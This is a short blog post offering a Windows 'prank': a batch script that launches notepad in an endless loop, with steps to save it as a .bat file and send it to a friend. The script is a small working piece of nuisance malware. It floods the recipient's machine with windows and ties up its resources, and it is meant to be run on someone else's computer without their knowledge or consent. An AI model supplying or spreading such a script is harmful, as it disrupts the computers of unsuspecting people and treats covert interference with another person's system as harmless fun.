Notpad Hack trick to open notpad continuously

This is a
simple notepad trick. This simple computer prank consists of a code
below that will drive your friend crazy as it opens notepad
continuously.
- Open the notepad and just copy the code bellow.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
- And save the it as anyname.bat
- Now send this to your friend.
Any Problems Leave comments below & Ask me...
THANK YOU
Post a Comment